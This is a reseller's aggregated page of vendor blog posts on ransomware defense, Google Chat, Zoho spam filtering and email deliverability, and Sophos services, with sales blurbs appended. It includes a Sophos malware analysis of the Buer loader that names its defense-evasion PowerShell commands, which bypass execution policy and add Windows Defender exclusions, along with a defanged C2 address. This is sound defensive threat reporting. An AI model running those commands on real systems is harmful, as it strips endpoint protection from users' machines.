5 critical steps to take – Sophos News

The outbreak of COVID-19 has put cyberattacks on healthcare providers into hyperdrive. Factors contributing to such attacks include, but aren’t limited to:

  • Decentralized business operations
  • Emergency COVID-19 facilities set up without planned security of IT infrastructure
  • A significant rise in the amount of patient health data stored by healthcare organizations
  • Telehealth, and remote workers flung around the world almost overnight, opening up security gaps

Ryuk ransomware, in particular, has seen a resurgence recently. Sophos recently identified a new spam campaign linked to the Ryuk actors, and our Managed Threat Response team assisted an organization in mitigating a Ryuk attack, providing insight into how the Ryuk actors’ tools, techniques, and practices have evolved.

The investigation showed an evolution of the tools used to compromise targeted networks and deploy the ransomware. But what was more notable was how quickly the attacks can move from initial compromise to ransomware deployment. Within three and a half hours of a target opening a phishing email attachment, attackers were already conducting network reconnaissance. Within a day, they had gained access to a domain controller and were in the early stages of an attempt to deploy ransomware.

The evasion techniques of ransomware are rapidly changing. In recent years, ransomware attacks have trended away from brute-force, large-scale attacks to focused, planned, and manually executed attacks that are much harder to detect and block. Humans are handcrafting artisanal malware.

The criminals have hybridized their attacks, combining automation to find victims with gaps in their defenses. Exposed servers with Remote Desktop Protocol (RDP) enabled, administrators without multi-factor authentication for remote access, unpatched web servers, or even these same issues at a trusted partner or service provider are enough to put your network, systems, and resources under ransom.

Here are the five things healthcare providers can do to protect against ransomware attacks:

  1. Maintain IT hygiene. Make sure you’re practicing basic IT hygiene, which includes installing all the latest patches, shutting down RDP entirely (or putting it behind a VPN), and making regular back-ups and keeping them offsite where attackers can’t find them. It also includes applying multifactor authentication to services hosting the most sensitive data in your organization. These are just some of the fundamental steps you can take to protect yourself and your network today.
  2. Educate your users. Teach them about the importance of strong passwords and roll out two-factor authentication wherever you can. Educate them on phishing, which is one of the main delivery mechanisms for ransomware.
  3. Minimize the risk of lateral movement within your network. Segment LANs into smaller, isolated zones or VLANs that are secured and connected by the firewall. Be sure to apply suitable IPS policies to rules governing the traffic traversing these LAN segments in order to prevent exploits, worms, and bots from spreading between LAN segments. And if an infection hits, automatically isolate infected systems until they can be cleaned up.
  4. Use endpoint detection and response (EDR) tools with your endpoint protection. Targeted ransomware today isn’t just about stopping one piece of malware; it’s about stopping an active adversary and disrupting the attack chain that puts them in a position to run the malware. Ensure every endpoint is protected and up to date. A device not functioning correctly may not be protected and could be vulnerable to a ransomware attack. Use tools like EDR, which allow you to ask detailed questions so that you can hunt for active adversaries and identify advanced threats in your network. Once you do, EDR also helps you take appropriate actions quickly to stop such threats.
  5. Close the gap with human intervention. Computers, automation, and tools are amazing but human intellect, pattern recognition, and our ability to apply context provide an even more formidable defense. Managed detection and response (MDR) services are critical here. Pairing your internal IT and security teams with an external team of elite threat hunters and response experts helps provide actionable advice for addressing the root causes of recurring incidents.

Sophos Intercept X Advanced with EDR

Sophos Intercept X Advanced with EDR includes all the features you need to help protect your organization from ransomware attacks like Ryuk, Sodinokibi, Maze, and Ragnar Locker.

Intercept X includes anti-ransomware technology that detects malicious encryption processes and shuts them down before they can spread across your network. Anti-exploit technology stops the delivery and installation of ransomware, deep learning blocks ransomware before it can run, and CryptoGuard prevents the malicious encryption of files, rolling them back to their safe states.

Furthermore, Sophos EDR helps keep your threat hunting and IT operations hygiene running smoothly across your entire estate. Sophos EDR empowers your team to ask detailed questions to identify advanced threats, active adversaries, and potential IT vulnerabilities, and then quickly take appropriate action to stop them. It enables you to detect adversaries lurking in your network and waiting to deploy ransomware that may have gone unnoticed.

Sophos Managed Threat Response (MTR)

The Sophos MTR service adds human expertise to your layered security strategy. An elite team of threat hunters proactively looks for and validates potential threats on your behalf. If authorized, they take action to disrupt, contain, and neutralize threats, and provide actionable advice to address the root causes of recurring incidents.

Sophos Rapid Response

If your organization is under attack and needs immediate incident response assistance, Sophos can help.

Delivered by an expert team of incident responders, Sophos Rapid Response provides lightning-fast assistance with identification and neutralization of active threats against organizations. On-boarding starts within hours, and most customers are triaged within 48 hours. The service is available for both existing Sophos customers as well as non-Sophos customers.

The Sophos Rapid Response team of remote incident responders quickly takes action to triage, contain, and neutralize active threats. Adversaries are ejected from your estate to prevent further damage to your assets.

Related reading

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Set your status as away in Google Chat in Gmail

Quick launch summary

You can now set yourself as “away” in Chat in Gmail.

When you set your status to away, you will show as offline to others, even when you’re active, helping you to focus solely on your work uninterrupted.

New presence menu in Gmail
Set your status as away on Gmail mobile apps

For domains that still use chat in classic Hangouts, disabling the “Show when you were last active” setting will now show you as away in Chat.

This feature is rolling out to Gmail on the web and the Gmail iOS app. It will be coming soon to the Gmail app on Android. We will post on the Google Workspace Updates blog when this rollout begins.

Getting started

Rollout pace

Availability

  • Available to Business Starter, Business Standard, Business Plus, Enterprise Essentials, Enterprise Standard, Enterprise Plus, Education, Enterprise for Education, and Nonprofits customers
  • Not available to Essentials customers

Resources


[ad_2]

Net Universe offers all Google devices with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/google.
You can visit our Shop Online

 

Think Twice: Know how Zoho Mail protects you from spam

In the last two parts of the Think Twice series we discussed email spam, those uninvited guests who wreak havoc at your email party, as well as types of email spam and tips to prevent it. Now that you know all about the trouble spam brings, you might be curious to know what reputable email service providers (ESPs) are doing to help protect users from spam of all types. 

One of the challenges ESP’s face is correctly identifying whether an email is spam or legitimate. Zoho Mail does this by studying community data—how and which users mark an email as spam or not spam. With the help of community data and pre-defined conditions, our servers can automatically identify half a million spam emails per hour on average with an admirable success rate. The use of community data in spam processing extends further.

Zoho mail spam protection

Say a user is sending an email from a third-party email server to a Zoho Mail user. For that email to get delivered to the recipient’s inbox, the sender’s IP should hold a positive reputation. The reputation score of an IP is dependent on the number of spam and non-spam emails generated from that IP. When a source with low reputation places an email transfer request to the Zoho Mail server, we will either reject the email or deliver it to the recipient mailbox’s spam folder, depending on the user settings.

Let spam stand in the bay:

If the nuances of classifying the right emails as spam is a challenge, determining the right approach for bulk emails is a bigger challenge. Though our filters can recognize and sift out emails with spam fingerprints—attachments masked with malware, phishing links, malicious executable macros, non-RFC compliant emails, unsolicited bulk emails, and more—the approach we need to take for each of them differs. While we filter out phishing emails more vigorously, reducing the false positives, we take a more user-specific approach concerning bulk emails, given that a bulk email can be spam to one user and of interest to another.

With the help of user-centric and organization-wide spam control settings, administrators can customize and choose what kind of emails they want Zoho Mail to deliver to their inbox. Starting from choosing which parts of an email you want us to analyze using our filters, administrators can choose to show sender-based alerts, process spam based on specific languages, and quarantine or reject emails based on authentication framework (SPF, DKIM, DMARC, and DNSBL) verification. The administrator can also add specific emails, domains, and IP addresses to their lists like Allowed list, or Blocked list to receive or not receive emails from certain senders. Apart from the administrator maintaining an organization-wide list, each user can customize their own anti-spam lists to block or allow users of their choice.

Combat phishing with added accuracy:

In our previous post, we discussed the technique spammers use to phish for personal data: copying the user interface and experience of a legitimate organization, including the domain address. For example, say you maintain your finances at a bank named Woods, and “woods.com” is their domain address. Now a spammer might phish using a domain—”vvoods.com” or “w00ds.com”—that looks like the legitimate address by changing a few letters to deceive recipients.

While our spam filters are capable of spotting such emails, you can also take additional spoof control measures for the domains that are significant to your organization by verifying all cousin domains of that respective domain. And it doesn’t stop there. You can protect your organization members from spoofed emails and prevent this fraud from happening with the help of Zoho Mail’s Display Name Spoofing feature.

Spam processing is not without its flaws because as ESPs improve their filtering mechanisms and block spam emails with higher accuracy, spammers also become more advanced in their masking techniques by using reputed services. Some spammers have started following RFC rules, SPF and DKIM authentication protocols, among others to escape spam processing. This new, evolved spam can sometimes slip through the filters and end up the recipient’s inbox.

This is why we’re constantly updating the Zoho Mail server to learn new fingerprints even with a small sample size. And don’t worry: even if one or two spam emails escape our wall of filters, our post-delivery spam check can identify and mark those emails as spam automatically.

Given all the challenges in identifying and processing spam, we at Zoho Mail place our users’ safety and security before every other priority. We have already added a ton of new spam control features to our all-new admin console. As we move forward, we’ll continue refining our techniques even further to improve your experience.

We hope the Think Twice blog series has helped you learn more about email spam and ways to prevent it! Give Zoho Mail’s anti-spam features a try and let us know what you think.


Yamine Durai


Yamine Durai, a part of Zoho Mail’s marketing team, is a tech enthusiast.
But if you spot her away from office hours, you will probably find her reading a history book while honing her oratory skills.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

How an effective onboarding system benefits your organization

Automating onboarding


Onboarding is one of the first opportunities you have to communicate your company culture to new employees. Having a straightforward onboarding system speaks volumes about your organization and gives hew hires a sense of direction. If the process is riddled with inefficiencies, employees will be more likely to leave your organization, and the money spent on recruiting and training these individuals goes waste. This is why onboarding should be automated. It provides a clear, simple experience to your employees.

Automating onboarding

Here are some of the benefits of automating onboarding:

  • Streamlines mundane administrative tasks and reduces errors

  • Supports candidate onboarding, which helps motivate candidates even before they join your organization

  • Digitizes the paperwork associated with onboarding, consolidating it all to a single application

  • Ensures compliance by documenting all the onboarding paperwork in a centralized system

  • Provides employees all the information they need about your organization

  • Generates reports, which makes it easy for you to track the progress of your new hires

Read more about how onboarding benefits your organization in our HR Knowledge Hive.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

Ensuring better inbox placement for Gmail recepients

Cover image

Expert Diaries from Zoho Campaigns connects avid email marketers to the experts in this space to help them learn some best practices and tips. Our aim is to connect email geeks and form a community that learns email marketing from one another.

We recently sat down with Sridhar Chandran, an anti-spam and email-deliverability expert with over 13 years of experience who currently works as Solution Architect at Validity, Inc. There, he helps high-volume senders optimize their email marketing for better email deliverability (inbox placement).

In our 40-minute chat, we discussed with Sridhar the specifics of email deliverability for Gmail and asked him many sought-after questions.

For those of you who prefer reading, here’s the rundown of the conversation.

Key terms

ISP – Inbox Service Providers, aka mailbox providers (for example, Gmail)

ESP – Email Service Providers (for example, Zoho Campaigns)

SPF – Sender Policy Validation

DKIM – DomainKeys Identified Mail

DMARC – Domain-based Message Authentication, Reporting, and Conformance

IPV6 – Internet Protocol Version 6

Google Postmaster – A tool by Gmail which helps you analyze your email performance

Sunset Policy – A plan or action for managing inactive contacts after a certain point of time

BIMI – Brand Indicators for Message Identification

VMC certificate – Verified Mark Certificates (A digital certificate authenticating the logo of a sender’s domain)

We know that filtering systems differ from one ISP to another, but how different is Gmail’s as opposed to the likes of Yahoo, Outlook, and more? More than often, 40% of a mailing list comprises Gmail recipients. In Asia, the number only goes up. So it’d be great if you could explain the specifics of Gmail’s spam filters.

 

To understand this, we’ve to trace how Gmail has evolved over the years. If you guys remember, Gmail offered 1TB storage while starting off in 2004. This was their USP. At that time, ISPs like AOL, Yahoo, and Hotmail offered limited storage. From a mail-filtering perspective, Gmail relied on IP reputation a lot. (90% of emails the ISPs receive per day is spam. So a lot of emails had to be blocked.)

They went one step ahead and created a separate folder called spam, while giving the users the option to move emails between spam and inbox. If a user moved an email from spam to inbox ascertaining it’s genuine, the spam filters took cues and expanded the data points used for decision-making. This was a major differentiator.

Then came IPV6, authentication method (like DKIM), and more signals. After a point, they started relying more on email-sending domain’s reputation than the IP reputation. (Both were used.) A domain’s reputation was decided based on different engagement signals: opens, clicks, getting added to the address book, emails moved from spam to inbox, and more. The other ISPs also emphasize engagement signals, but Gmail implemented this much earlier. Gmail also had the advantage of basing filtering decisions around Google’s data points.

For example: If you’re a brand-new sender, other ISPs have to gauge you based on the volume of emails you send. This is because they’re seeing you for the first time. When it comes to Gmail, they can use certain data points from Google: your website’s ranking, its shelf life, and more.

Gmail doesn’t have a traditional feedback loop like Yahoo or Hotmail—so how does a sender troubleshoot their (deliverability) issues with Gmail?

 

Yes, you’re right. Gmail doesn’t have a traditional feedback loop like other mailbox providers. But there are some signals you can take a look at. Again, this might not be unique to Gmail. (Some other mailbox providers might also have them.) The first one is bounces—hard bounces and soft bounces. This is something I feel that most users are not utilizing.

When most of your emails have traces of spam, the defence mechanism for most mailbox providers is rejecting the emails, right? So as a sender, you have to take a look at the delivery rates. The second one is unsubscribes. The other major thing at Google is Postmaster Tools. I highly recommend that everyone utilizes it. The best part is this: The domain owner can directly register for it by visiting the site. (You don’t have to depend on your ESP for the configuration.)

In summary, you have to keep a close eye on your engagement metrics. For example: When you get only 10% opens from a delivery rate of 98%, there’s definitely some issue. You can also monitor your deliverability using certain third-party tools: Return Path, 250ok, and more.

What are the various data points a sender should look at in Google Postmaster (to narrow down email-deliverability-based problems)? What are the thresholds one should check?

Gmail provides the traditional engagement metrics. If you’re looking at spam complaints, it’s available in Google Postmaster. You can also check your domain and IP reputation there. (Which is a valuable data point.) There’s also authentication results, which are important to know the stability of mechanisms like SPF, DKIM, and DMARC.

To answer the second question, there are no set or predefined thresholds. However, there are some industry standards for spam complaint rates. Less than 0.2% is a good place to be in. Having your bounce rates below 0.4% is a good benchmark. That said, your reputation is divided into four bands in Google Postmaster: high, medium, low, and bad.

If your reputation is high, you’ll have higher thresholds. If it’s poor, you don’t even want to hit 0.1% complaints. Threshold levels are dynamic. (It varies based on the reputation band.) So know which band you’re in and play around with the numbers.

Gmail has several tabs—social, updates, primary, and, particularly, promotions. So I wanted to ask this: Is the promotions tab really bad? Even if it’s not bad, what determines the placement of an email there?

This is one of the commonly asked questions. It’s a little frustrating too. We have to understand that the promotions tab is inbox; it’s not a spam folder. That said, I can understand the mindset of the senders: primary tab placement means better engagement rates.

Over time, filters have evolved to place the marketing emails in promotions. As a sender, we have to understand this: If a user enables tabs for their mailbox, it means they don’t want to see marketing emails in their primary tab. Earlier, I used to manually create several folders based on from addresses and more. The data fed to the filters is so much that they’re able to decide the placement of marketing emails. They’re making lives easier for the users. So we should try to leverage the promotions tab instead of fighting it. Remember, the users have the option to move your emails to the primary tab as well.

Coming to your next question, Gmail has a Natural Language Processing engine, specifically looking at the content of your email. Of course, they have machine learning capabilities to classify content based on data signals. (We don’t have to worry about this.) A study by 250ok found that one in four users didn’t configure tabs in their mailbox at all. Apple Mail and Outlook don’t have a tabbed structure for inboxes, right? I’d always look at leveraging the promotions tab.

Why not try Gmail’s email annotations if your email contains offers and deals? Use JSON script. It helps in bringing your emails to the top of the promotions tab in a very action-provoking manner.

I have a follow-up question, Sridhar. I’m seeing a lot of people discussing the usage of URLs in emails. They feel that using three or more URLs leads to the placement in the promotions tab. How far is it true?

First, I’d like to bust the myth here: it’s not true. Of course, there are no magic numbers in terms of the quantity of URLs. I’d prioritize the quality of the URLs over quality. When I say quality, I mean the destination of the URLs. You have to check whether it’s pointing to the website(s) you’re managing; you don’t want to use third-party URLs. I’ll not worry about the number of URLs. In Gmail, we know for a fact that the email gets clipped when its size exceeds a certain limit. This is something I’d look at rather than the number of URLs. You should also answer a couple of questions before sending an email: Is the HTML correct? Are the URLs specified out? You can also include a text version along with the HTML version (images) as most of the clients disable images by default.

Most emails received per day go to the spam folder. Gmail has a specifically different way of spam foldering. Usually they don’t mark many emails as spam. How should the email marketers see to it that they are not marked as spammers?

Also, can you please tell us how can the email marketer understand which subscriber is inactive and which subscriber is not?

There are no particular magic numbers for this so I will speak anecdotally.

Firstly, the destination of your email or where it’s going to land is decided even before you hit the send button. Factors like single opt-in, double opt-in, purchased lists, and so on are taken into account. The quality of your list is the first important thing you have to keep in mind. There are lot of ways by which you can go ahead and validate your list to ensure that typos and all those kinds of things can be taken care of.

Secondly, it’s about your audience, their engagement factor, active users and so on.

Industry best practice or threshold we have seen is somewhere around 90 days. It is supposed to be a good number within an active audience.

Create segments for 30 days, 60 days, 90 days active users and call them reputation superheroes. If you are getting a lot of spam complaints, suppress the older addresses and send mails to the 30 days active audiences to uplift your reputation. Gmail specifically takes a look at the engagement factor to ensure that you are sending emails to only those audiences who are consistently interactive.

Among segments, there will always be one such segment that contains the data of audiences with whom you have not interacted for a considerable period. Times like these call for you to look into your sunset policy and undertake re-engagement campaigns. Ask your audiences if they organically want to be a part of your lists or opt out. Repeat this periodically rather than once in two years when your emails are marked as spam.

Again, there are many ways to let your emails engage with your audience. Create journeys as simple as welcome journeys. This is underutilized by many senders and so they stay bereft of their benefits.

Also try to engage audiences with cart abandonment journeys. Keep a close tab on the engagement pattern and make amends in the creatives to fetch more engagement with the most appropriate content.

With automation, we are achieving time- and response-based user engagement. What are your views on automation?

 I will speak about this from a deliverability perspective. Gmail does look at the engagement and how frequently your users have engaged with your emails. Employing these journeys lets the filters know that you are sending to engaged audiences for improved reputation. It also allows the benefit of having a great reputation.

As I said, Gmail annotations are useful, but they alone cannot ensure a better position in the Promotions tab. To utilize this, you have to be at the top of your reputation game. Email journeys is a big help in achieving that.

What should be in the checklist of an email marketer with a great sending reputation while moving over from one email marketing platform to another? Which best practices will ensure a smooth transition?

If you already have an established reputation at a particular ESP and are moving to another one, you have to warm up (Domain and IP). This is because you are shifting to a new infrastructure.

You might traditionally send from one IP and one domain combination and then suddenly move on to another one. Gmail will consider that as a new signal so you have to warm up. Initially start sending out emails in slow volume instead of putting your foot on the accelerator.

Before starting, make sure that your infrastructure has everything in place. Complete all the authentication processes (SPF, DKIM, DMARC) and let Gmail consider your emails as authenticated traffic. Upon completion of the previous process, send emails to your most-engaged audiences. Take 10 percent from among the 30 days active users and shift them so that you can retain brand affinity even when emails are sent out from a different infrastructure.

Apart from this, there’s another thing that you need to monitor—the Google postmaster tools. Once you have done the transition from one ESP to another, looking at the signals in Google Postmaster tools will help. You can check whether your authentication is alright, if the domain reputation is dropping, and so on. Keep in mind that the data we see in Google postmaster tools is not real-time—there can be a delay of 48-72 hours. Pace out campaigns in such a way that you give enough time to those monitoring tools to update the data.

Apart from this, I would say that a traditional switchover can at least take two to four weeks. It again depends on the volume of subscribers you have. Check the time frame you need to give for a switchover from one ESP to another and also allow proper warm up to happen.

Now DMARC and BIMI are hot topics. How important are they for my inbox placement?

DMARC actually has three policies:

– p = None

– p = Quarantine

– p = Reject

P = quarantine and p = reject are the only enforcement policies, whereas P = none is actually a monitoring mode. The latter does not actually help the inbox providers as they are not making any decisions based on that DMARC policy. As an email marketer, you can begin with p = None. You wouldn’t lose anything with this, only that you have to go ahead and evaluate all your email traffic based on this DMARC policy.

The enforcement mode enables an advantage to senders for taking care of any spoofing and brand-related theft. You actually inform mailbox providers if the authentication is not in place so they can go ahead and spam folder or reject your emails. Just having authentication or DMARC in place is not going to ensure inbox placement. All the other signals we have been speaking for the previous hour are applicable.

BIMI right now is being utilized only at Yahoo. In Gmail you need to have an additional VMC certificate to utilize BIMI as there it is still in the beta stage. In Yahoo you don’t need that to utilize BIMI. I would say as a sender you need to first concentrate on getting into a DMARC enforcement policy as BIMI can still wait.

We say that some emails when opened have the option to either mark them as spam or hit unsubscribe. How does Gmail decide to show this and why doesn’t it show for all the senders?

The primary reason behind this is the domain reputation, and thus Gmail doesn’t decide to show this for all the senders. A mailbox provider wants to provide less information to a bad sender and as much information available to a good sender.

The second thing is including a list unsubscribe header, which is currently being prescribed by a lot of mailbox providers. Mail clients such as Apple Mail and Gmail clients pick the unsubscribe from list unsubscribe header and surface it to the subscriber or the user.

Elaborating a bit on list unsubscribe—the ‘unsubscribe‘ option in particular—it’s good to have the ‘unsubscribe’ in the footers, which is a requisite in some markets, but it’s also good to have it in the headers. The absence of that option might force your users to mark your mail as spam. It’s rather good to have it in both the places.

When I open the emails I see the ‘alert’ banners. We see banners like ’emails from this particular domain are marked as spam’ and ‘this mail is dangerous’ or ‘this link is dangerous’. How can a sender resolve this issue quickly and what is the use of it?

A lot of this is dependent on domain reputation. Rightly as those banners say, there are a lot of different rules that decide why a mail is placed in the spam folder apart from domain reputation being poor.

The other thing that makes your email look dangerous is a phishing signal. You might have a URL or something in the email that has phishing characteristics. In that case you might want to look at the content of your email, check all the URLs, and remove any URLs that are not hosted by you. I have seen people who break down the content of the email and send in different parts to troubleshoot where exactly the problem lies. There’s some effort involved if it’s a phishing-related issue.

The bigger picture is, ‘hey, my mails are going to spam folder, how do I get it back to inbox?’ So, reiterating what was mentioned previously, you need to have a good mailing list in place, looking at your audience, sending to an engaged audience, looking at your content, making sure that it’s structured in such a way that ensures your audiences are engaged and are going ahead and clicking the CTAs.

If you are already having a lot of spam complaints, then add an additional ‘unsubscribe’ at the top of your email instead at the bottom of your emails. It will give your users an easy opt-out rather than marking the email as spam. If you are getting spam foldered, I would suggest you do not look like a spammer, follow the best practices, ensure your sending emails to people who really want your email.

How long would it take to fix my domain reputation if I am following all the best practices?

It depends on the band of reputation in Google Postmaster tools. If you are somewhere amidst a very poor reputation, it would take around 4-6 weeks while following all the best practices. It takes time as it depends on the number of positive signals given by you to Gmail for returning to the inbox. Look at a long timeframe—if you are doing everything right, you will see the benefit.

Net Universe offers all Zoho subscritpions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

Under attack? Sophos Rapid Response is here to help  – Sophos News

Experiencing an active cyberattack and defending against a potential breach can be an incredibly stressful time for an organization. However, many internal IT security teams lack the experience necessary to successfully respond to potential breaches, and getting immediate help from an outside resource can be next to impossible… until today.   

We’re thrilled to announce the availability of Sophos Rapid Response, a new service which provides lightning-fast assistance with active threats, delivered by an expert team of incident responders.

The service, which has already helped dozens of organizations while in pilot mode, is available to both existing Sophos customers as well as non-Sophos customers.

Seconds matter

When under attack, time is of the essence. That’s why the Rapid Response service is built to be fast. How fast? Onboarding starts within hours, and most customers are triaged in 48 hours.

“I’ve seen firsthand how the Sophos Rapid Response team is able to cut through all of the noise to quickly remediate security incidents within hours, and the feedback from customers has been nothing but exceptional,” said Jeremy Weiss, cybersecurity practice lead at CDW.

The Rapid Response team are experts at quickly stopping advanced attacks, minimizing damage and costs, and reducing recovery time. Regardless of whether it’s a ransomware infection, network compromise, or unauthorized access attempting to circumvent security controls, they’ve seen it all and stopped it all.

A new type of incident response service

Rapid Response is an industry first, offering a fixed-fee remote incident response service that responds to active cybersecurity attacks throughout its entire 45-day term of engagement.

There are no hidden fees or escalating costs, and customers are protected for the full 45-day subscription term. Should the threat return or a related threat emerge, Rapid Response will respond at no additional cost.

Unlike traditional incident response (IR) services, which are priced hourly, you and the Rapid Response team have the same goal: to get your organization out of the danger as quickly as possible. And since the service is delivered remotely, response actions can be initiated on day one.

“A charitable organization providing housing and support services to thousands of vulnerable adults was hit by ransomware, taking down operations at all of its more than 40 facilities. The organization called us for help, and we immediately deployed Sophos Rapid Response. Working together with Sophos Rapid Response, we were able to get them back up and running quickly so they could continue serving those in need,” said Steve Weeks, president at Netcetera.“

More information about Rapid Response can be found on our website.

Interested in ongoing managed detection and response? Sophos Managed Threat Response (MTR) provides ongoing 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

inside the Buer Loader malware-as-a-service – Sophos News

During our investigation of a Ryuk attack in September 2020, we found the Ryuk actors had used a relatively new method for gaining initial access: a malware dropper called Buer. The September attack was part of a low-volume spear phishing attack tracked by Sophos. Over the next month, it evolved into a much larger spam campaign, carrying Buer as well as a number of other types of “loader” malware, as the Ryuk operators sought to ramp up their attacks.

First introduced in August of 2019, Buer is a malware-as-a-service offering that is used to deliver whatever package the service customer desires, providing initial compromise of targets’ Windows PCs and allowing them to establish a digital beachhead for further malicious activity. Buer has previously been tied to banking trojan attacks and other malware deployments—and now, apparently, has been embraced by ransomware operators. In many ways, Buer is positioned as an alternative to Emotet and Trickbot’s emerging Bazar loader (which both use similar behaviors to deploy).

Full-service bots

Buer was first advertised in a forum post on August 20, 2019 under the title “Modular Buer Loader”, described by its developers as “a new modular bot…written in pure C” with command and control (C&C) server code written in .NET Core MVC (which can be run on Linux servers). For $350 (plus whatever fee a third-party guarantor takes), a cybercriminal can buy a custom loader and access to the C&C panel from a single IP address—with a $25 charge to change that address. Buer’s developers limit users to two addresses per account.

The bot code, compiled for each user specific to a download, has an advertised size between 22 and 26 kilobytes—though the sample we looked at was about 40 kilobytes after being unpacked from its dropper. The bot can be configured for execution either as a 32-bit Windows executable or as a DLL.

The C&C can be used to track the number of successful downloads in a campaign, and to assign tasks to bots by filters such as the country they’re in, the “bitness of the operating system” (32 or 64 bit), the number of processors on the infected machine and the level of permissions obtained by the bot. Bots detected to be operating within the Commonwealth of Independent States will be shut down—which is a common behavior of malware developed in the ex-USSR region, as an attempt to avoid attention from local authorities.

screenshot
The “file manager in the command and control “panel” for the Buer loader bot. Files can be uploaded for distribution here—the maximum size is 28 megabytes.
The Buer panel tracks installations by operating system, CPU, “bitness” (32 or 64), activity, and which geographic region they’re in based on localization settings and other fingerprinting.

Tasks can be scheduled to run for a specific amount of time, or suspended upon command, with telemetry for the task sent back to the panel. The panel can also be used to deploy updates to bots, including (at least based on the advertisement) deployment of modules, with prebuilt modules to be added “over time” as part of the service. And of course, setup consulting and technical support are provided.

Prize inside every doc

flow chart
Buer loader attack flow.

Sophos’ Rapid Response team discovered a sample of Buer at the root cause of a September Ryuk attack. The loader was delivered by a malicious document stored on Google Docs, which required the victim to enable scripted content to activate—a behavior similar to Emotet and other loader attacks via malicious spam emails but leveraging cloud storage to make forensic analysis more difficult.

We collected other messages from the same campaign in Sophos’ spam traps during the same period. The messages all used Google Docs files, and were sent using a popular commercial email distribution service—further obscuring the source and the link associated with the malicious document.

screenshot of email
An example of the initial run of Buer bot distributing spear phishes.

The payload of that malicious document was named print_document.exe. Like other Buer dropper samples we’ve analyzed, it was a digitally signed binary, using a stolen and now-revoked certificate issued by DigiCert to “NEEDCODE SP Z O O,” a Polish software developer, issued on September 17, 2020. The dropper was built using modified code from a Microsoft sample application for image capture, AcquireTest, using the code’s function for “file enumeration” to delete and drop code.

The dropper does a number of things to ensure proper delivery. It first checks for the presence of a debugger to evade forensic analysis, and then checks language and localization settings to determine the geographic region of the system being attacked. If the settings match a CIS country, it will exit without depositing the malware. Otherwise, the dropper then dumps the Buer bot in memory and executes it.

Intriguingly, the Buer Loader and Ryuk ransomware uses same shellcode loader to execute the unpacked malware code in memory:

This may not be an indication of shared authorship; the developers may have simply used the same sample code as their source.

Upon launch, the Buer bot does a number of things to set up shop. The bot executes two sets of PowerShell commands—one to bypass execution policies to allow PowerShell commands executed by the bot to go through without warnings (Set-ExecutionPolicy Bypass), and another (add-mppreference -exclusionpath) to make changes to Windows Defender’s exclusion list—concealing files it downloads from Windows’ built-in malware protection.

Buer queries the Windows Registry for the value of MicrosoftCryptographyMachineGuid to get the unique identifier for the infected machine.  And the bot calls home, interacting with the command and control server (in this case, 104[.]248.83.13) through a series of secure HTTP “POST” and “GET” messages.

Then there’s the “loader” part of what Buer does. The files packaged to be dropped by Buer are retrieved from a designated source and dropped in a folder created in the C:ProgramData directory—the directory name is created programmatically and varies with deployments. In the September attack, Buer was used to deploy a Cobalt Strike beacon to the infected computer, which was then in turn used to exploit the network and launch a Ryuk attack.

Mixing it up

The malicious spam campaign that resulted in the Buer loader and Ryuk ransomware infections evolved at the end of September, as we observed the actors behind it shift the same tactics away from low volume on SendGrid to mail sent through Internet hosting providers—predominantly through a single Russian ISP. Then in October, the volume of spam rose dramatically—shifting away from Google Docs (as Google shut down the old files for terms of service violations) to another commercial email and file delivery service.

A somewhat less targeted spam message with a link to a malicious document stored by Constant Contact.

In the last two phases, while the tactics remained similar and other hallmarks suggested the spam actor was the same, multiple types of “dropper” malware were deployed as attachments. In addition to Buer, samples of Bazar and ZLoader were also found, with delivery payloads varying. For one Bazar loader payload, the attackers used a password-protected Excel spreadsheet. During the same timeframe, Bazar and ZLoader were also known to be involved in Ryuk attacks.

It’s clear that Ryuk is back, and that the actors behind it are evolving their methods for initial compromise, using multiple loader bots to achieve initial access. It’s not clear if the same actor is behind all of these attacks, using multiple malware-as-a-service platforms to deliver Ryuk, or if there are multiple Ryuk actors. But the similarity in techniques across these campaigns suggests that there is at least coordination between them: they use targeted emails with cloud-based malicious documents and a lure to spur immediate action (often related to wages or taxes).

The best mitigation for these attacks is to reinforce training on phishing attacks. While these malicious emails are targeted, they are usually awkwardly worded and use the target’s name in odd ways. Careful reading of the email will tip off most educated users. But these attacks are growing in sophistication, and even well-trained users may eventually click on the wrong link in an email if spam detection doesn’t catch them first.

Sophos detects and blocks Buer both with custom detections (Troj/BeurLd-A) and machine learning, and detects the spear phishing messages as spam.

Sophos would like to acknowledge the contributions of Peter Mackenzie, Elida Leite, Syed Shahram and Bill Kearny of the Sophos Rapid Response team, and Anand Ajjan, Brett Cove and Gabor Szappanos of SophosLabs for their contributions to this report

 

Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

XG Firewall v18 performance gains mean more traffic and better security – Sophos News

XG Firewall v18 includes several performance gains that will breathe new life into your network, enabling you to handle more traffic and better secure it.

If you haven’t upgraded to XG Firewall v18 already, you’re going to want to do so as soon as possible to take advantage of the substantial performance benefits waiting for you.

What are the gains and where do they come from?

Consider these potential performance boosts available by upgrading to XG Firewall v18:

Those are some impressive performance improvements!

One of the most exciting enhancements to XG Firewall in v18 was the introduction of the new Xstream Architecture, with its all-new streaming DPI engine, advanced TLS 1.3 inspection solution, and Network Flow FastPath.

Let’s look at how the Xstream Architecture upgrades your performance:

Trusted traffic FastPath acceleration

The new Xstream Network Flow FastPath is all about performance. It directs trusted traffic that doesn’t require security scanning into a fast lane through the system. This not only minimizes latency and accelerates application traffic through the firewall, it also has the added benefit of not engaging the DPI engine for deep-packet inspection of trusted traffic.

